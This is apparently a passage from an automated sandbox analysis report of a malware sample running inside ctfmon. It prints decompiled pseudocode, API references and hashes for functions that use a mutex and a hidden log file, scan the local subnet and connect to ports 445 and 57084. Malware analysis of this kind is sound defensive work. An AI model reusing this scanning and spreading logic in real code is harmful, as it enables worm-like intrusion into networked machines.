				_t18 = GetLastError() & 0xffffff00 | _t17 == 0x000000b7;
				if(_t30 == 0) {
					L3:
					_pop(_t31);
					_t10 =  &_v16; // 0x2d383132
					return E00970A5D( *_t10 ^ _t35, _t31);
				} else {
					if(_t18 == 0) {
						_pop(_t32);
						return E00970A5D(_v16 ^ _t35, _t32);
					} else {
						ReleaseMutex(_t30);
						CloseHandle(_t30);
						goto L3;
					}
				}
			}




















                                                0x00969316
                                                0x0096931c
                                                0x00969323
                                                0x00969335
                                                0x0096933b
                                                0x0096934e
                                                0x00969356
                                                0x00969361
                                                0x0096936c
                                                0x00969377
                                                0x0096937f
                                                0x00969385
                                                0x00969392
                                                0x00969397
                                                0x009693ab
                                                0x009693ad
                                                0x009693ae
                                                0x009693bf
                                                0x00969399
                                                0x0096939b
                                                0x009693c9
                                                0x009693d4
                                                0x0096939d
                                                0x0096939e
                                                0x009693a5
                                                0x00000000
                                                0x009693a5
                                                0x0096939b

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00969335
                                                • CreateMutexA.KERNELBASE ref: 0096937F
                                                • GetLastError.KERNEL32 ref: 00969387
                                                • ReleaseMutex.KERNEL32(00000000), ref: 0096939E
                                                • CloseHandle.KERNEL32(00000000), ref: 009693A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastReleaseStartup
                                                • String ID: /LU5/$218-$278D$6EE}
                                                • API String ID: 2916891069-3745470937
                                                • Opcode ID: 8fc565f5028599f27111368fe3e27121f257a941ce100faab6b514e4455d8aad
                                                • Instruction ID: 4f02c4bfd4241f2dcca69461635434eae09e04f30cdecccd83706b46057f2b9d
                                                • Opcode Fuzzy Hash: 8fc565f5028599f27111368fe3e27121f257a941ce100faab6b514e4455d8aad
                                                • Instruction Fuzzy Hash: A511A07241C7448BD7309F20E84A7EAB7D8BF86700F40050DE89D8A390DB3154458B83
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00966D40 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 107sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 255 966d40-966dbe call 973440 * 2 GetWindowsDirectoryA call 965180 call 966fe0 263 966dc3-966dcf 255->263 264 966dd1-966e06 EnterCriticalSection 263->264 265 966e31-966e3e LeaveCriticalSection 264->265 266 966e08-966e2c call 971920 call 966ef0 264->266 268 966ea0-966ea4 Sleep 265->268 269 966e40-966e42 265->269 266->265 268->264 271 966e45-966e4a 269->271 271->271 273 966e4c-966e51 271->273 274 966e62-966e6f call 970aa1 273->274 275 966e53-966e5f call 975c70 273->275 280 966e87-966e91 call 96b070 274->280 281 966e71-966e81 call 967720 274->281 275->274 280->264 286 966e97-966e9b Sleep 280->286 281->264 281->280 286->264
                                                C-Code - Quality: 84%
                                                			E00966D40() {
				signed int _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v40;
				char _v300;
				char _v560;
				signed int _t18;
				signed char _t29;
				signed int _t30;
				intOrPtr* _t31;
				void* _t35;
				signed char _t47;
				intOrPtr _t51;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr* _t59;
				signed int _t60;
				void* _t61;
				void* _t63;

				_t18 =  *0x98f008; // 0x35554c2f
				_v8 = _t18 ^ _t60;
				_push(_t56);
				E00973440(_t56,  &_v300, 0, 0x104);
				E00973440(_t56,  &_v560, 0, 0x104);
				GetWindowsDirectoryA( &_v560, 0x104);
				_push("NetworkDistribution");
				E00965180( &_v300, 0x104, "%s\\%s\\",  &_v560);
				_t63 = _t61 + 0x2c;
				_t29 = E00966FE0(1,  &_v300, _t56); // executed
				_t57 = Sleep;
				asm("sbb bl, bl");
				_t47 =  ~_t29 &  ~_t29;
				while(1) {
					asm("xorps xmm0, xmm0");
					_v40 = 0;
					asm("movups [ebp-0x23], xmm0");
					_t59 = 0;
					_v15 = 0;
					asm("movq [ebp-0x13], xmm0");
					_v11 = 0;
					_v9 = 0;
					EnterCriticalSection(0x996a5c);
					_t30 =  *0x995ba0;
					if(_t30 != 0) {
						_t49 =  *0x995b9c;
						_t38 = _t30 - 1;
						_t59 =  *((intOrPtr*)( *0x995b9c));
						 *0x995ba0 = _t30 - 1;
						E00971920( *0x995b9c, _t49 + 4, _t38 << 2);
						_t63 = _t63 + 0xc;
						E00966EF0(0x995b80);
					}
					L3:
					LeaveCriticalSection(0x996a5c);
					if(_t59 == 0) {
						Sleep(0x64);
						continue;
						do {
							while(1) {
								asm("xorps xmm0, xmm0");
								_v40 = 0;
								asm("movups [ebp-0x23], xmm0");
								_t59 = 0;
								_v15 = 0;
								asm("movq [ebp-0x13], xmm0");
								_v11 = 0;
								_v9 = 0;
								EnterCriticalSection(0x996a5c);
								_t30 =  *0x995ba0;
								if(_t30 != 0) {
									_t49 =  *0x995b9c;
									_t38 = _t30 - 1;
									_t59 =  *((intOrPtr*)( *0x995b9c));
									 *0x995ba0 = _t30 - 1;
									E00971920( *0x995b9c, _t49 + 4, _t38 << 2);
									_t63 = _t63 + 0xc;
									E00966EF0(0x995b80);
								}
								goto L3;
							}
							L9:
							_t35 = E00967720(_t47,  &_v40,  &_v300, _t57, _t59, _t70);
							_t71 = _t35;
						} while (_t35 != 0);
						L10:
						if(E0096B070( &_v40, _t71) == 0) {
							Sleep(0xa);
						}
						continue;
					}
					_t31 = _t59;
					_t13 = _t31 + 1; // 0x1
					_t54 = _t13;
					do {
						_t51 =  *_t31;
						_t31 = _t31 + 1;
					} while (_t51 != 0);
					if(_t31 - _t54 > 4) {
						E00975C70( &_v40, 0x20, _t59);
						_t63 = _t63 + 0xc;
					}
					_push(0x2c);
					E00970AA1(_t59);
					_t63 = _t63 + 8;
					_t70 = _t47;
					if(_t47 == 0) {
						goto L10;
					} else {
						goto L9;
					}
				}
			}
























                                                0x00966d49
                                                0x00966d50
                                                0x00966d55
                                                0x00966d66
                                                0x00966d79
                                                0x00966d8d
                                                0x00966d93
                                                0x00966db0
                                                0x00966db5
                                                0x00966dbe
                                                0x00966dc3
                                                0x00966dcd
                                                0x00966dcf
                                                0x00966dd1
                                                0x00966dd1
                                                0x00966dd4
                                                0x00966ddd
                                                0x00966de1
                                                0x00966de3
                                                0x00966dea
                                                0x00966def
                                                0x00966df5
                                                0x00966df9
                                                0x00966dff
                                                0x00966e06
                                                0x00966e08
                                                0x00966e0e
                                                0x00966e0f
                                                0x00966e11
                                                0x00966e1f
                                                0x00966e24
                                                0x00966e2c
                                                0x00966e2c
                                                0x00966e31
                                                0x00966e36
                                                0x00966e3e
                                                0x00966ea2
                                                0x00966ea4
                                                0x00966dd1
                                                0x00966dd1
                                                0x00966dd1
                                                0x00966dd4
                                                0x00966ddd
                                                0x00966de1
                                                0x00966de3
                                                0x00966dea
                                                0x00966def
                                                0x00966df5
                                                0x00966df9
                                                0x00966dff
                                                0x00966e06
                                                0x00966e08
                                                0x00966e0e
                                                0x00966e0f
                                                0x00966e11
                                                0x00966e1f
                                                0x00966e24
                                                0x00966e2c
                                                0x00966e2c
                                                0x00000000
                                                0x00966e06
                                                0x00966e71
                                                0x00966e7a
                                                0x00966e7f
                                                0x00966e7f
                                                0x00966e87
                                                0x00966e91
                                                0x00966e99
                                                0x00966e99
                                                0x00000000
                                                0x00966e91
                                                0x00966e40
                                                0x00966e42
                                                0x00966e42
                                                0x00966e45
                                                0x00966e45
                                                0x00966e47
                                                0x00966e48
                                                0x00966e51
                                                0x00966e5a
                                                0x00966e5f
                                                0x00966e5f
                                                0x00966e62
                                                0x00966e65
                                                0x00966e6a
                                                0x00966e6d
                                                0x00966e6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00966e6f

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00966D8D
                                                  • Part of subcall function 00966FE0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096703C
                                                  • Part of subcall function 00966FE0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0096704C
                                                  • Part of subcall function 00966FE0: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00967055
                                                  • Part of subcall function 00966FE0: DeleteFileA.KERNEL32(?), ref: 00967093
                                                • EnterCriticalSection.KERNEL32(00996A5C), ref: 00966DF9
                                                • LeaveCriticalSection.KERNEL32(00996A5C), ref: 00966E36
                                                • Sleep.KERNEL32(0000000A), ref: 00966E99
                                                • Sleep.KERNEL32(00000064), ref: 00966EA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateCriticalDirectoryFileSectionSleep$ChangeCloseDeleteEnterFindLeaveNotificationWindows
                                                • String ID: %s\%s\$/LU5/$NetworkDistribution
                                                • API String ID: 2690460970-3291581938
                                                • Opcode ID: 31bda5d5b334f175bf78109b8b7e7411bc2dd7b2ab40fa6b33a33d7db5362021
                                                • Instruction ID: b1262a175c9738dff041d3bec5b8b43bf018eed38ccc666cabcaa53e1133c3fc
                                                • Opcode Fuzzy Hash: 31bda5d5b334f175bf78109b8b7e7411bc2dd7b2ab40fa6b33a33d7db5362021
                                                • Instruction Fuzzy Hash: 07314B71E40318ABEB11EBB4DC56FDE73B8EF85704F504054F544B7291EBB2AA4887A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B320 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 287 96b320-96b345 socket 288 96b347-96b37a inet_addr htons connect 287->288 289 96b382-96b393 call 970a5d 287->289 290 96b394-96b3a1 closesocket call 96b290 288->290 291 96b37c closesocket 288->291 295 96b3a6-96b3a8 290->295 291->289 295->289 296 96b3aa-96b3bb call 970a5d 295->296
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0096B33A
                                                • inet_addr.WS2_32(?), ref: 0096B351
                                                • htons.WS2_32(000001BD), ref: 0096B35F
                                                • connect.WS2_32(00000000,?,00000010), ref: 0096B370
                                                • closesocket.WS2_32(00000000), ref: 0096B37C
                                                • closesocket.WS2_32(00000000), ref: 0096B394
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID: /LU5/
                                                • API String ID: 279130052-937868281
                                                • Opcode ID: e84a62f949c1e589f23d4fedc06fc669fcb384906958c29dcbe20c5492f1a18c
                                                • Instruction ID: d39447f1fd87dc155638687a17206c7e66cfffd6f1d039d78b0ad61d2e9899d7
                                                • Opcode Fuzzy Hash: e84a62f949c1e589f23d4fedc06fc669fcb384906958c29dcbe20c5492f1a18c
                                                • Instruction Fuzzy Hash: C111A535A112089BCB10AFB4AD09AEEB7A4EF85320F110259E8259B3D1EF714D459791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096B290 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 299 96b290-96b2b8 socket 300 96b2f1-96b303 call 970a5d 299->300 301 96b2ba-96b2e9 inet_addr htons connect 299->301 302 96b304-96b31c closesocket call 970a5d 301->302 303 96b2eb closesocket 301->303 303->300
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0096B2AD
                                                • inet_addr.WS2_32(?), ref: 0096B2C4
                                                • htons.WS2_32(0000DEFC), ref: 0096B2CE
                                                • connect.WS2_32(00000000,?,00000010), ref: 0096B2DF
                                                • closesocket.WS2_32(00000000), ref: 0096B2EB
                                                • closesocket.WS2_32(00000000), ref: 0096B304
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID: /LU5/
                                                • API String ID: 279130052-937868281
                                                • Opcode ID: d6a31c64db3273614dbbc7d01828ba15e35253820b2cb0e637ff2804e5fca65f
                                                • Instruction ID: 7ab5782f064971199b78f55c05c44d29a0871b1ba2c8aea9bcc55fb07c65afbb
                                                • Opcode Fuzzy Hash: d6a31c64db3273614dbbc7d01828ba15e35253820b2cb0e637ff2804e5fca65f
                                                • Instruction Fuzzy Hash: BB01C835A11208ABCB10AFB8AC49AEEB7B8FF89321F110269F925D7391DB314D049790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00964AC0 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 82%
                                                			E00964AC0(void* __ecx, intOrPtr __edx, void** _a4, long* _a8) {
				void* _v8;
				long _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				void* _t44;
				long _t51;
				void* _t52;
				long _t61;
				long _t62;
				void* _t63;
				long _t66;
				void* _t78;
				void* _t79;
				long* _t80;
				long _t87;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t93;

				_v24 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t44 = E009649E0( &_v8,  &_v12); // executed
				_t93 = _t92 + 4;
				if(_t44 != 0) {
					_t87 = _v12;
					_t78 = 0;
					_v16 = 0;
					__eflags = _t87;
					if(__eflags <= 0) {
						L10:
						LocalFree(_v8); // executed
						return _v16;
					} else {
						while(1) {
							_t90 = E00970A6E(_t90, __eflags, 0x58);
							_v20 = _t90;
							_v20 = _t90;
							E00973440(_t87, _t90, 0, 0x58);
							_t93 = _t93 + 0x10;
							asm("movups xmm0, [ebx+eax]");
							asm("movups [esi], xmm0");
							asm("movups xmm0, [ebx+eax+0x10]");
							asm("movups [esi+0x10], xmm0");
							asm("movups xmm0, [ebx+eax+0x20]");
							asm("movups [esi+0x20], xmm0");
							asm("movups xmm0, [ebx+eax+0x30]");
							asm("movups [esi+0x30], xmm0");
							asm("movups xmm0, [ebx+eax+0x40]");
							_t79 = _t78 + 0x50;
							asm("movups [esi+0x40], xmm0");
							__eflags =  *_t90 - _v24;
							if( *_t90 == _v24) {
								break;
							}
							_t78 = _t79 +  *(_t90 + 0x38) +  *(_t90 + 0xc);
							__eflags = _t78 - _t87;
							if(__eflags < 0) {
								continue;
							} else {
								LocalFree(_v8);
								return _v16;
							}
							goto L11;
						}
						_t51 =  *(_t90 + 0xc);
						_v12 = _t51;
						_t52 = LocalAlloc(0x40, _t51); // executed
						 *(_t90 + 0x50) = _t52;
						 *((intOrPtr*)(_t90 + 0x54)) = LocalAlloc(0x40,  *(_t90 + 0x38));
						E00983DB0( *(_t90 + 0x50), _v8 + _t79, _v12);
						E00983DB0( *((intOrPtr*)(_t90 + 0x54)), _v12 + _t79 + _v8,  *(_t90 + 0x38));
						_t61 = E009648B0( &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							goto L10;
						} else {
							_t89 = _v20;
							_t80 = _a8;
							_t62 =  *(_t89 + 8);
							 *_t80 = _t62; // executed
							_t63 = LocalAlloc(0x40, _t62); // executed
							 *_a4 = _t63;
							E00973440(_t89, _t63, 0,  *(_t89 + 8));
							_t66 = E00961000(_t63, _t80,  *((intOrPtr*)(_t89 + 0x50)), _v12);
							__eflags = _t66;
							if(_t66 == 0) {
								__eflags =  *_t80 -  *(_t89 + 8);
								_t69 =  ==  ? 1 : _v16 & 0x000000ff;
								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
								goto L10;
							} else {
								LocalFree( *_a4);
								LocalFree(_v8);
								return _v16;
							}
						}
					}
				} else {
					return _t44;
				}
				L11:
			}

























                                                0x00964acb
                                                0x00964ad3
                                                0x00964ada
                                                0x00964ae1
                                                0x00964ae6
                                                0x00964aeb
                                                0x00964af4
                                                0x00964af7
                                                0x00964af9
                                                0x00964afd
                                                0x00964aff
                                                0x00964c42
                                                0x00964c45
                                                0x00964c54
                                                0x00964b05
                                                0x00964b05
                                                0x00964b0f
                                                0x00964b11
                                                0x00964b14
                                                0x00964b1c
                                                0x00964b24
                                                0x00964b27
                                                0x00964b2b
                                                0x00964b2e
                                                0x00964b33
                                                0x00964b37
                                                0x00964b3c
                                                0x00964b40
                                                0x00964b45
                                                0x00964b49
                                                0x00964b51
                                                0x00964b54
                                                0x00964b58
                                                0x00964b5a
                                                0x00000000
                                                0x00000000
                                                0x00964b62
                                                0x00964b64
                                                0x00964b66
                                                0x00000000
                                                0x00964b68
                                                0x00964b6b
                                                0x00964b7a
                                                0x00964b7a
                                                0x00000000
                                                0x00964b66
                                                0x00964b7b
                                                0x00964b84
                                                0x00964b87
                                                0x00964b90
                                                0x00964b9c
                                                0x00964ba8
                                                0x00964bbd
                                                0x00964bc8
                                                0x00964bcd
                                                0x00964bcf
                                                0x00000000
                                                0x00964bd1
                                                0x00964bd1
                                                0x00964bd4
                                                0x00964bd7
                                                0x00964bdd
                                                0x00964bdf
                                                0x00964bf0
                                                0x00964bf2
                                                0x00964c02
                                                0x00964c0a
                                                0x00964c0c
                                                0x00964c36
                                                0x00964c3c
                                                0x00964c3f
                                                0x00000000
                                                0x00964c0e
                                                0x00964c13
                                                0x00964c1c
                                                0x00964c2b
                                                0x00964c2b
                                                0x00964c0c
                                                0x00964bcf
                                                0x00964af3
                                                0x00964af3
                                                0x00964af3
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 009649E0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,00964AE6,?), ref: 00964A03
                                                  • Part of subcall function 009649E0: GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 00964A23
                                                  • Part of subcall function 009649E0: LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 00964A32
                                                  • Part of subcall function 009649E0: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964A42
                                                • new.LIBCMT ref: 00964B07
                                                • LocalFree.KERNEL32(00000000), ref: 00964B6B
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID:
                                                • API String ID: 1503672127-0
                                                • Opcode ID: 66d7f441d90b28fe5b5294ba54f762111809bba8c50472d80dcdb8fabd15e046
                                                • Instruction ID: b22dd6222fcaa726b34376caf49e8da2995c2a1801102815b71e8b1dc92ac2e1
                                                • Opcode Fuzzy Hash: 66d7f441d90b28fe5b5294ba54f762111809bba8c50472d80dcdb8fabd15e046
                                                • Instruction Fuzzy Hash: DF51C471D04704ABDB11DFA8DD45BEEBBB4FF48318F044594EE88A7212E731AA94DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096AFC0 Relevance: 12.1, APIs: 8, Instructions: 54sleepthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E0096AFC0() {
				void* __edi;
				void* _t7;
				void* _t9;
				signed int _t14;
				signed int _t15;
				void* _t18;
				void* _t19;

				Sleep(0xbb8); // executed
				_t7 = 0;
				do {
					_t1 = _t7 + L"wuauclt.exe"; // 0x750077
					_t14 =  *_t1 & 0x0000ffff;
					_t7 = _t7 + 2;
					 *(_t7 + 0x996836) = _t14;
					_t22 = _t14;
				} while (_t14 != 0);
				E00969D90(_t22);
				_t9 = E0096AE20(_t14, _t18, _t22);
				if(_t9 != 0) {
					while(1) {
						L4:
						EnterCriticalSection(0x995bfc);
						_t15 =  *0x995c18;
						if(_t15 == 0) {
							break;
						}
						_t19 =  *( *0x995c14 + _t15 * 4 - 4);
						 *0x995c18 = _t15 - 1;
						E00966EF0(0x995bf8);
						if(_t19 != 0) {
							CreateThread(0, 0, E0096AD60, _t19, 0, 0);
						}
						LeaveCriticalSection(0x995bfc);
						Sleep(0x64);
					}
					LeaveCriticalSection(0x995bfc);
					Sleep(0xbb8);
					Sleep(0x64);
					goto L4;
				}
				return _t9;
			}










                                                0x0096afce
                                                0x0096afd0
                                                0x0096afd2
                                                0x0096afd2
                                                0x0096afd2
                                                0x0096afd9
                                                0x0096afdc
                                                0x0096afe3
                                                0x0096afe3
                                                0x0096afe8
                                                0x0096afed
                                                0x0096aff4
                                                0x0096b000
                                                0x0096b000
                                                0x0096b005
                                                0x0096b00b
                                                0x0096b013
                                                0x00000000
                                                0x00000000
                                                0x0096b01a
                                                0x0096b01f
                                                0x0096b02a
                                                0x0096b031
                                                0x0096b041
                                                0x0096b041
                                                0x0096b04c
                                                0x0096b050
                                                0x0096b050
                                                0x0096b059
                                                0x0096b060
                                                0x0096b064
                                                0x00000000
                                                0x0096b064
                                                0x0096b06b

                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 0096AFCE
                                                • EnterCriticalSection.KERNEL32(00995BFC), ref: 0096B005
                                                • CreateThread.KERNEL32(00000000,00000000,0096AD60,?,00000000,00000000), ref: 0096B041
                                                • LeaveCriticalSection.KERNEL32(00995BFC), ref: 0096B04C
                                                • Sleep.KERNEL32(00000064), ref: 0096B050
                                                • LeaveCriticalSection.KERNEL32(00995BFC), ref: 0096B059
                                                • Sleep.KERNEL32(00000BB8), ref: 0096B060
                                                • Sleep.KERNEL32(00000064), ref: 0096B064
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalSection$Leave$CreateEnterThread
                                                • String ID:
                                                • API String ID: 2546236395-0
                                                • Opcode ID: 7eb589b385daf2799637463965b82113fa5d94308b984037f50f204705be7e2c
                                                • Instruction ID: 85383c79b9625e3234344c12a4467cfc9c7acf818e80f9f02ed248c2267dbac4
                                                • Opcode Fuzzy Hash: 7eb589b385daf2799637463965b82113fa5d94308b984037f50f204705be7e2c
                                                • Instruction Fuzzy Hash: 8E01D6347587089BD6217F9C9D45F6E3B54EF84B44F16005AB608AB2D0EBA158C49BB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00967C20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121sleepnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 473 967c20-967c4d 474 967c53-967c8c call 973440 gethostname gethostbyname 473->474 477 967c97-967cb4 474->477 478 967c8e-967c95 Sleep 474->478 479 967ddf-967de6 Sleep 477->479 480 967cba-967cbc 477->480 478->474 479->474 481 967cc0-967d16 call 965180 480->481 484 967d1c-967d1f 481->484 485 967d18-967d1a 481->485 487 967d22-967d27 484->487 486 967d2b-967d64 call 965a00 call 967df0 485->486 493 967d66-967d6e call 965cf0 486->493 494 967d73-967d98 call 96b4e0 486->494 487->487 488 967d29 487->488 488->486 493->494 497 967d9d-967dac 494->497 498 967dae-967dd3 497->498 499 967dd9 497->499 498->481 498->499 499->479
                                                C-Code - Quality: 63%
                                                			E00967C20() {
				char _v8;
				char _v16;
				signed int _v20;
				char _v21;
				short _v23;
				char _v27;
				char _v52;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v332;
				signed int _v336;
				signed int _t43;
				signed int _t44;
				intOrPtr* _t50;
				signed char* _t52;
				signed int _t53;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr* _t61;
				signed int _t67;
				signed char* _t68;
				void* _t71;
				intOrPtr _t73;
				signed char** _t77;
				signed int _t78;
				void* _t81;
				signed int _t82;
				intOrPtr* _t84;
				signed int _t85;
				void* _t86;
				void* _t87;
				void* _t88;

				_push(0xffffffff);
				_push(E0098467B);
				_push( *[fs:0x0]);
				_t87 = _t86 - 0x140;
				_t43 =  *0x98f008; // 0x35554c2f
				_t44 = _t43 ^ _t85;
				_v20 = _t44;
				_push(_t44);
				 *[fs:0x0] =  &_v16;
				_t81 = Sleep;
				while(1) {
					L1:
					E00973440(_t81,  &_v308, 0, 0x100);
					_t87 = _t87 + 0xc;
					gethostname( &_v308, 0x100); // executed
					_t50 =  &_v308;
					__imp__#52(_t50); // executed
					_t84 = _t50;
					if(_t84 == 0) {
						break;
					}
					_v336 = 0;
					_t52 =  *( *(_t84 + 0xc));
					_t72 =  *_t52 & 0x000000ff;
					_t78 = _t52[1] & 0x000000ff;
					_t53 = _t52[2] & 0x000000ff;
					if(( *_t52 & 0x000000ff) == 0x7f) {
						L15:
						Sleep(0xdbba0); // executed
						continue;
					}
					_t82 = 0;
					do {
						_push(_t53);
						_push(_t78);
						asm("xorps xmm0, xmm0");
						_v52 = 0;
						asm("movq [ebp-0x1f], xmm0");
						asm("movups [ebp-0x2f], xmm0");
						_v27 = 0;
						_v23 = 0;
						_v21 = 0;
						E00965180( &_v52, 0x20, "%d.%d.%d.*", _t72);
						_t88 = _t87 + 0x18;
						_v312 = 0xf;
						_v316 = 0;
						_v332 = 0;
						if(_v52 != 0) {
							_t56 =  &_v52;
							_t20 = _t56 + 1; // 0x1
							_t78 = _t20;
							do {
								_t73 =  *_t56;
								_t56 = _t56 + 1;
							} while (_t73 != 0);
							_t57 = _t56 - _t78;
							L10:
							_push(_t57);
							_push( &_v52);
							E00965A00(_t71,  &_v332, _t82, _t84);
							_v8 = 0;
							_t61 = E00967DF0( &_v332,  &_v332);
							_v8 = 0xffffffff;
							 *_t61 = 0;
							_t62 = _v312;
							if(_v312 >= 0x10) {
								E00965CF0(_t71, _t78, _t82, _v332, _t62 + 1);
							}
							_v312 = 0xf;
							_v316 = 0;
							_v332 = 0;
							E0096B4E0(_t71,  *((intOrPtr*)( *(_t84 + 0xc) + _t82)), 1, _t82, 0); // executed
							_t77 =  *(_t84 + 0xc);
							_t87 = _t88 + 4;
							if( *((short*)(_t84 + 0xa)) +  *(_t77 + _t82) >=  *_t84) {
								break;
							} else {
								goto L13;
							}
						}
						_t57 = 0;
						goto L10;
						L13:
						_t67 = _v336 + 1;
						_v336 = _t67;
						_t82 = _t67 * 4;
						_t68 =  *(_t77 + _t82);
						_t72 =  *_t68 & 0x000000ff;
						_t78 = _t68[1] & 0x000000ff;
						_t53 = _t68[2] & 0x000000ff;
					} while (( *_t68 & 0x000000ff) != 0x7f);
					_t81 = Sleep;
					goto L15;
				}
				Sleep(0x2bf20);
				goto L1;
			}




































                                                0x00967c23
                                                0x00967c25
                                                0x00967c30
                                                0x00967c31
                                                0x00967c37
                                                0x00967c3c
                                                0x00967c3e
                                                0x00967c43
                                                0x00967c47
                                                0x00967c4d
                                                0x00967c53
                                                0x00967c53
                                                0x00967c61
                                                0x00967c66
                                                0x00967c75
                                                0x00967c7b
                                                0x00967c82
                                                0x00967c88
                                                0x00967c8c
                                                0x00000000
                                                0x00000000
                                                0x00967c9a
                                                0x00967ca4
                                                0x00967ca6
                                                0x00967ca9
                                                0x00967cad
                                                0x00967cb4
                                                0x00967ddf
                                                0x00967de4
                                                0x00000000
                                                0x00967de4
                                                0x00967cba
                                                0x00967cc0
                                                0x00967cc0
                                                0x00967cc1
                                                0x00967cc8
                                                0x00967ccb
                                                0x00967cd2
                                                0x00967cda
                                                0x00967cde
                                                0x00967ce5
                                                0x00967ceb
                                                0x00967cef
                                                0x00967cf4
                                                0x00967cf7
                                                0x00967d05
                                                0x00967d0f
                                                0x00967d16
                                                0x00967d1c
                                                0x00967d1f
                                                0x00967d1f
                                                0x00967d22
                                                0x00967d22
                                                0x00967d24
                                                0x00967d25
                                                0x00967d29
                                                0x00967d2b
                                                0x00967d2b
                                                0x00967d2f
                                                0x00967d36
                                                0x00967d41
                                                0x00967d49
                                                0x00967d4e
                                                0x00967d55
                                                0x00967d5b
                                                0x00967d64
                                                0x00967d6e
                                                0x00967d6e
                                                0x00967d7a
                                                0x00967d84
                                                0x00967d91
                                                0x00967d98
                                                0x00967d9d
                                                0x00967da0
                                                0x00967dac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00967dac
                                                0x00967d18
                                                0x00000000
                                                0x00967dae
                                                0x00967db4
                                                0x00967db5
                                                0x00967dbb
                                                0x00967dc2
                                                0x00967dc5
                                                0x00967dc8
                                                0x00967dcc
                                                0x00967dd0
                                                0x00967dd9
                                                0x00000000
                                                0x00967dd9
                                                0x00967c93
                                                0x00000000

                                                APIs
                                                • gethostname.WS2_32(?,00000100), ref: 00967C75
                                                • gethostbyname.WS2_32(?), ref: 00967C82
                                                • Sleep.KERNEL32(0002BF20), ref: 00967C93
                                                • Sleep.KERNELBASE(000DBBA0), ref: 00967DE4
                                                Strings
                                                Memory Dump Source
